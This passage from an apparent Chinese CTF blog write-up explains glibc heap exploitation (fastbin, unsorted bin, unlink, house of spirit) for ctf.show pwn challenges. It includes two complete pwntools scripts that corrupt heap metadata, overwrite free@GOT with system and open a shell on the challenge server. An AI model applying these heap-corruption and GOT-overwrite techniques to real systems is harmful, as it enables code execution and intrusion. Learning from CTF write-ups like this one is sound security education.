id=\"u0009a084\">\u5148\u7533\u8bf7\u4e00\u4e2a32B\u7684chunk0\uff0c\u518d\u7533\u8bf7\u4e00\u4e2a32B\u7684chunk1\uff0cfree\u6389chunk1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DG6ALC30GSPYJZLQGEK4KW.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"738\" height=\"512\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DG6ALC30GSPYJZLQGEK4KW.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-252\"  sizes=\"auto, (max-width: 738px) 100vw, 738px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7675c888\">chunk1\u8fdb\u5165\u4e86tcachebin<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LWG2GP8@KVGHUOEE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"755\" height=\"489\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LWG2GP8@KVGHUOEE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-253\"  sizes=\"auto, (max-width: 755px) 100vw, 755px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uaa766872\">\u7136\u540e\u901a\u8fc7\u6ea2\u51fa\u6765\u4fee\u6539chunk1\u7684fd\u6307\u9488:<\/p>\n\n\n\n<p id=\"ubf3ae635\">magic=0x6020a0<\/p>\n\n\n\n<p id=\"ufd1950e3\">payload=cyclic(0x20)+p64(0)+p64(0x31)+p64(magic)<\/p>\n\n\n\n<p id=\"ub078c773\">\u624b\u8f93payload\u4f1a\u62a5\u9519\uff0c\u5199\u811a\u672c\u5427<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WQQXSNZLHM8IQ6XM3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"278\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WQQXSNZLHM8IQ6XM3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-254\"  sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EZ_XQOQ9_V@QWZN3Y.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"345\" height=\"95\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EZ_XQOQ9_V@QWZN3Y.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-255\"  sizes=\"auto, (max-width: 345px) 100vw, 345px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u710316d1\">fd\u6307\u9488\u5df2\u7ecf\u88ab\u4fee\u6539\uff0c\u4f46\u662fbins\u91cc\u9762\u8fd8\u662f\u4e71\u6307<\/p>\n\n\n\n<p id=\"u33c75b49\">\u6309\u7406\u6765\u8bf4\uff0c\u4fee\u6539chunk1\u7684fd\u6307\u9488\u540e\u7533\u8bf7\u4e24\u6b21\u5c31\u80fd\u62ff\u5230\u76ee\u6807\u5730\u5740\uff0c\u4f46\u662f\u4e0d\u884c\uff0c\u53ef\u80fd\u662f\u8fd9\u4e2a\u539f\u56e0\uff0c\u6216\u8bb8\u672c\u9898\u7684\u7248\u672c\u538b\u6839\u8fd8\u6ca1\u5f15\u5165tcache bin\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WYB51RO7FN4KG@JR4X-1024x225.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"225\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/WYB51RO7FN4KG@JR4X-1024x225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-256\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ud0cf2211\">\u90a3\u5c31\u8bd5\u8bd5unsorted bin\u5427\uff0c\u590d\u4e60\u4e00\u4e0b\u5806\u7684\u5206\u914d\u673a\u5236\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/KYU@2C9UD3VND6A-1024x688.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/KYU@2C9UD3VND6A-1024x688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-257\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OX0A_I03C2_MISUL-1024x388.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"388\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OX0A_I03C2_MISUL-1024x388.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-258\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"udd46871a\">\u5b98\u65b9wp\u4e2d\u7684\u6709\u4e9b\u90e8\u5206\u6709\u70b9\u591a\u4f59\uff0c\u8fdb\u884c\u4e86\u4fee\u6539\uff0c\u6700\u7b80\u6d01\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p id=\"u1a506299\">\u7533\u8bf7\u4e00\u4e2achunk0 \u4efb\u610f\u5927\u5c0f\uff08\u540e\u9762payload\u6ce8\u610f\u8ddf\u8fdb\u5c31\u884c\uff0c\u6ce8\u610f\u4e00\u4e0b\u5bf9\u9f50\u548cprevsize\u590d\u7528\u673a\u5236\uff09<\/p>\n\n\n\n<p id=\"u50bd887a\">\u4e00\u4e2achunk1 \u5fc5\u987b\u5927\u4e8e0x80(\u5b9e\u6d4b\u5927\u4e8e120\u5373\u53ef\uff0c\u5e94\u8be5\u662f\u5bf9\u9f50\u673a\u5236\uff0c\u53cd\u6b63\u4e0d\u80fd\u653e\u5165fast bin\u5373\u53ef)<\/p>\n\n\n\n<p id=\"uc4a3b040\">\u7533\u8bf7\u4e00\u4e2achunk2, \u4efb\u610f\u5927\u5c0f\uff0c\u4f5c\u7528\u662f\u9632\u6b62chunk1\u8ddftop chunk\u5408\u5e76<\/p>\n\n\n\n<p id=\"u87e13f19\">free chunk1\uff0c\u7136\u540eedit chunk0\uff0c\u6ea2\u51fa\u4fee\u6539chunk1\u7684bk\u6307\u9488\uff0c\u518d\u7533\u8bf7\u4e00\u4e2a\u5408\u9002\u5927\u5c0f\u7684chunk\u5c31\u80fd\u62ff\u5230bk\u6307\u9488\u6307\u5411\u7684\u5730\u5740\uff0c\u8fd9\u4e2a\u201c\u5408\u9002\u5927\u5c0f\u201d\u7531edit\u7684payload\u4e2d\u628achunk1\u7684size\u4fee\u6539\u6210\u7684\u503c\u51b3\u5b9a\uff0c\u5982\u679c\u628achunk1\u4fee\u6539\u62100x91,\u5373145\uff0cchunk\u7533\u8bf7\u7684\u503c\u5c31\u5f97\u5bf9\u9f50\u540e\u662f0x80,\u5373128.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u59c861ce\">\u8fd8\u53ef\u4ee5\u7528unlink\u6253\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\n#io = process(\"\/home\/monke\/ctfshowpwn\/pwn\")\n\nio= remote(\"pwn.challenge.ctf.show\",28196)\n\n#chunk0\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'64')\n\nio.sendlineafter(\"Content of heap:\",b'bbbb')\n\n#chunk1\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'128')\n\nio.sendlineafter(\"Content of heap:\",b'cccc')\n\n#chunk2\n\nio.sendlineafter(\"choice :\",b'1')\n\nio.sendlineafter(\"eap : \",b'128')\n\nio.sendlineafter(\"Content of heap:\",b'dddd')\n\nptr=0x6020c0\n\nfd=ptr-0x18\n\nbk=ptr-0x10\n\n#fakechunk\n\nfakechunk=p64(0)#prevsize\n\nfakechunk+=p64(0x41) #size\n\nfakechunk+=p64(fd)\n\nfakechunk+=p64(bk)\n\nfakechunk+=b'\\x00'*0x20\n\nfakechunk+=p64(0x40)#chunk1's prevsize,0x40 means chunk0 is 0x40 and in free\n\nfakechunk+=p64(0x90)#chunk1's size\n\n#edit fakechunk\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",str(len(fakechunk)))\n\nio.sendlineafter(\"Content of heap : \",fakechunk)\n\n#gdb.attach(io)\n\n#delete chunk1 and chun0 unlink\n\nio.sendlineafter(\"choice :\",b'3')\n\nio.sendlineafter(\"Index :\",b'1')\n\nmagic=0x6020a0\n\n#edit ptr chunk0 -&gt;magic\n\npayload=p64(0)*2+p64(0x40)+p64(magic)\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",str(len(payload)))\n\nio.sendlineafter(\"Content of heap : \",payload)\n\n#edit magic\n\nio.sendlineafter(\"choice :\",b'2')\n\nio.sendlineafter(\"Index :\",b'0')\n\nio.sendlineafter(\"eap : \",b'32')\n\nio.sendlineafter(\"Content of heap : \",b'eeee')\n\n#gdb.attach(io)\n\nio.sendline(\"114514\")\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u310336bc\"><\/p>\n\n\n\n<p id=\"u6d44d64c\">\u8fd8\u53ef\u4ee5\u7528house of spirit\u6253\uff1a<\/p>\n\n\n\n<p id=\"u6984c782\">\u8fd9\u91cc\u6211\u641e\u6e05\u695a\u4e86\uff0c\u6211\u4e00\u5f00\u59cb\u7528tcache bin attack\u6253\u4e0d\u901a\u5e94\u8be5\u662f\u56e0\u4e3a\u5bf9\u5e94\u7248\u672c\u8fd8\u6ca1\u6709tcache bin\uff08\u6240\u4ee5unsorted bin attack\u65f6\u5019\u4e0d\u7528\u8003\u8651\u5148\u628atcache bin\u585e\u6ee1\u4e5f\u80fd\u901a\uff09\uff0c\u6240\u4ee5\u8981\u8003\u8651\u4e5f\u5e94\u8be5\u662ffast bin attack\uff0c\u800cfastbin\u7684\u4f2a\u9020chunk\u662f\u6bd4\u8f83\u82db\u523b\u7684\uff0c\u6709\u68c0\u67e5\uff0c\u6240\u4ee5\u6253\u4e0d\u901a\u3002house of spirit\u5c31\u662ffastbin attack\u7684\u4e00\u79cd\uff0c\u641e\u61c2\u4e86\u8fd9\u4e2a\u5c31\u641e\u61c2\u4e86\u4e3a\u4ec0\u4e48\u6700\u5148\u7684\u90a3\u79cd\u65b9\u6cd5\u901a\u4e0d\u4e86\u3002<\/p>\n\n\n\n<p id=\"uc9e2bf6a\">fastbin\u7684\u68c0\u6d4b\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/112858036\">https:\/\/zhuanlan.zhihu.com\/p\/112858036<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/qq_41453285\/article\/details\/97753705\">https:\/\/blog.csdn.net\/qq_41453285\/article\/details\/97753705<\/a><\/p>\n\n\n\n<p id=\"udce14843\">\u5c0f\u6280\u5de7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J85E0EMX2DPYUTYB-1024x340.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J85E0EMX2DPYUTYB-1024x340.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-259\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75657cc2\">\u627e\u4e00\u4e2ax7f\u6765\u5f53size\u5c31\u53ef\u4ee5\u9003\u8fc7\u68c0\u6d4b<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u4ed6708e\">House Of Spirit<\/p>\n\n\n\n<p id=\"uff513fbe\">\u521b\u5efa\u4e09\u4e2achunk,free chunk2,\u94fe\u2f0afastbin,edit\u4fee\u6539chunk1\u5185\u5bb9\uff0c\u5e76\u4e14\u8986\u76d6\u5230free chunk2\u7684fd,fd\u5c31\u53ef<\/p>\n\n\n\n<p id=\"u44b440dd\">\u4ee5\u8986\u76d6\u4e3afake chunk.<\/p>\n\n\n\n<p id=\"ub9e3dcf3\">\u6211\u4eec\u5728heaparray\u9644\u8fd1\u4f2a\u9020chunk,\u4e3a\u4e86\u7ed5\u8fc7free fastbins\u7684\u2f24\u2f29\u68c0\u67e5\uff0c\u5728\u9644\u8fd1\u627e\u52300x7f,\u53ef\u4ee5\u8c03\u8bd5\u627e\u5230\u5408<\/p>\n\n\n\n<p id=\"u29686ad3\">\u9002\u7684\u5730\u2f45\uff1a0x602090 -3\uff0c\u5e76\u628a\u8fd9\u2fa5\u4f5cfake chunk,size\u5c31\u662f0x7f.<\/p>\n\n\n\n<p id=\"uf151a066\">\u521b\u5efa\u2f00\u4e2achunk,\u5206\u914d\u5230chunk2<\/p>\n\n\n\n<p id=\"uf47e43ca\">\u518d\u521b\u5efa\u2f00\u4e2achunk3,\u5206\u914d\u5230fakechunk,<\/p>\n\n\n\n<p id=\"u7dd41f28\">edit\u4fee\u6539chunk3,\u8986\u76d6\u5230heaparray\uff0c\u5199\u2f0afree_got<\/p>\n\n\n\n<p id=\"uc05d3a01\">\u518d\u4fee\u6539heaparray[0],\u628afree_got\u6539\u4e3asystem_plt\u7684\u5730\u5740<\/p>\n\n\n\n<p id=\"u413c3366\">\u8fd9\u2fa5\u9700\u8981\u2f00\u4e2a\u2019\/bin\/sh\\x00\u2019\uff0c\u53ef\u4ee5\u5728\u5f00\u59cb\u4feechunk1\u7684\u65f6\u5019\u5199\u2f0a<\/p>\n\n\n\n<p id=\"u8dba3ea5\">\u91ca\u653echunk1,&#8221;\/bin\/sh\\x00&#8243;\u5f53\u4f5c\u53c2\u6570\u4f20\u2f0afree(),free\u5df2\u6539\u4e3asystem,\u5b9e\u9645\u6267\u2f8fsystem(&#8220;\/bin\/sh\\0x00&#8221;)\uff0c<\/p>\n\n\n\n<p id=\"ud67bb4ef\">\u7136\u540eget shell<\/p>\n\n\n\n<p id=\"u921e640d\">exp<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1 from pwn import *\n\n2 context(arch = 'amd64',os = 'linux',log_level = 'debug')\n\n3 #io = process('.\/pwn')\n\n4 io = remote('pwn.challenge.ctf.show',28227)\n\n5 elf = ELF('.\/pwn')\n\n6 libc = ELF('\/home\/bit\/libc\/64bit\/libc-2.23.so')\n\n7 free_got = elf.got&#91;'free']\n\n8 system = elf.plt&#91;'system']\n\n9 heaparray_0 = 0x6020c0\n\n10 heaparray_1 = 0x6020c8\n\n11 heaparray_2 = 0x6020d0\n\n12 heaparray_3 = 0x6020d8\n\n13\n\n14 def create_heap(size,content):\n\n15 io.recvuntil(\"choice :\")\n\n16 io.sendline(\"1\")\n\n17 io.recvuntil(\":\")18 io.sendline(str(size))\n\n19 io.recvuntil(\":\")\n\n20 io.sendline(content)\n\n21\n\n22 def edit_heap(idx,size,content):\n\n23 io.recvuntil(\"choice :\")\n\n24 io.sendline(\"2\")\n\n25 io.recvuntil(\":\")\n\n26 io.sendline(str(idx))\n\n27 io.recvuntil(\":\")\n\n28 io.sendline(str(size))\n\n29 io.recvuntil(\":\")\n\n30 io.sendline(content)\n\n31\n\n32 def delete_heap(idx):\n\n33 io.recvuntil(\"choice :\")\n\n34 io.sendline(\"3\")\n\n35 io.recvuntil(\":\")\n\n36 io.sendline(str(idx))\n\n37\n\n38 create_heap(0x68,'aaaa')\n\n39 create_heap(0x68,'bbbb')\n\n40 create_heap(0x68,'cccc')\n\n41 delete_heap(2)\n\n42\n\n43 payload = '\/bin\/sh\\x00' + 'a' * 0x60 + p64(0x71) + p64(0x602090-3)\n\n44 edit_heap(1,len(payload),payload)\n\n45 create_heap(0x68,'aaaa')\n\n46 create_heap(0x68,'dddd')\n\n47 payload = '\\xaa' * 3 + p64(0) * 4 + p64(free_got)\n\n48 edit_heap(3,len(payload),payload)\n\n49 payload = p64(system)\n\n50\n\n51 edit_heap(0,len(payload),payload)\n\n52 delete_heap(1)\n\n53\n\n54 io.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u3db40b04\"><\/p>\n\n\n\n<p id=\"ud1d4c5dc\">fastbin attack\u8ddfunsorted bin attack \u7ecf\u5e38\u4e00\u8d77\u7528\uff0cunsorted bin\u53ef\u4ee5\u4fee\u6539\u4efb\u610f\u5730\u65b9\u7684\u503c\uff0c\u4fee\u6539\u6210x7f\u5c31\u80fd\u7ed9fastbin attack\u7528\u4e86<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_160%EF%BC%88%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%89\"><\/span>pwn 160\uff08\u5806\u98ce\u6c34\uff09<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"u9f6f8994\">\u83dc\u5355\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R_@WQOX5OK_K1XPVRA-1024x872.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"872\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R_@WQOX5OK_K1XPVRA-1024x872.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-260\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf9896103\">add:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2GMY7T27YOXVD8ISE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"927\" height=\"555\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2GMY7T27YOXVD8ISE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-261\"  sizes=\"auto, (max-width: 927px) 100vw, 927px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ufdcc5ffe\">\u6bcf\u4e00\u6b21add\u4f1a\u8fdb\u884c\u4e24\u6b21malloc\uff0c\u7b2c\u4e00\u6b21\u7528\u6237\u81ea\u5df1\u5b9a\u4e49\u5927\u5c0f\uff0c\u7b2c\u4e8c\u6b21\u7cfb\u7edf\u89c4\u5b9a0x80\uff0c\u7136\u540e\u628a\u7cfb\u7edf\u89c4\u5b9a\u7684chunk\u7684\u5730\u5740\u7684\u503c\u53c8\u89c6\u4e3a\u4e00\u4e2a\u5730\u5740\uff0c\u5e76\u628a\u7528\u6237\u81ea\u5df1\u5b9a\u4e49\u521b\u5efa\u7684chunk\u8d4b\u503c\u7ed9\u5b83\u3002<\/p>\n\n\n\n<p id=\"ua19b3367\">\u7531\u6b64\u53ef\u4ee5\u731c\u51fa\u7ed3\u6784\u4f53\u4e3a\uff1a<\/p>\n\n\n\n<p id=\"u99c737af\">chunk{<\/p>\n\n\n\n<p id=\"ucbfa6928\">*description<\/p>\n\n\n\n<p id=\"uc35197fa\">char[0x7c]<\/p>\n\n\n\n<p id=\"ua0df3a60\">}<\/p>\n\n\n\n<p id=\"u05448d61\">\u5176\u4e2ddescription\u6307\u9488\u6307\u5411\u4e00\u5757\u81ea\u5b9a\u4e49\u5927\u5c0f\u7684chunk\uff0c\u800c\u4e14\u672c\u9898\u662f\u5148\u5f00\u8f9fdescription\u7684chunk\u518d\u5f00\u8f9f\u7ed3\u6784\u4f53\u7684chunk\uff01\u8fd9\u4e00\u70b9\u8ddf\u4e4b\u524d\u9047\u5230\u7684\u9898\u4e0d\u4e00\u6837<\/p>\n\n\n\n<p id=\"u8d20c299\">delete\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/19A0B3C5J4LK0Y9S7KYI.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"453\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/19A0B3C5J4LK0Y9S7KYI.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-263\"  sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf475fa73\">delete\u628a\u4e24\u4e2achunk\u90fdfree\u4e86\uff0c\u4f46\u662fdescription\u6307\u9488\u6ca1\u6709\u7f6e\u7a7a\uff0c\u6709uaf<\/p>\n\n\n\n<p id=\"uf9543f38\">show\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 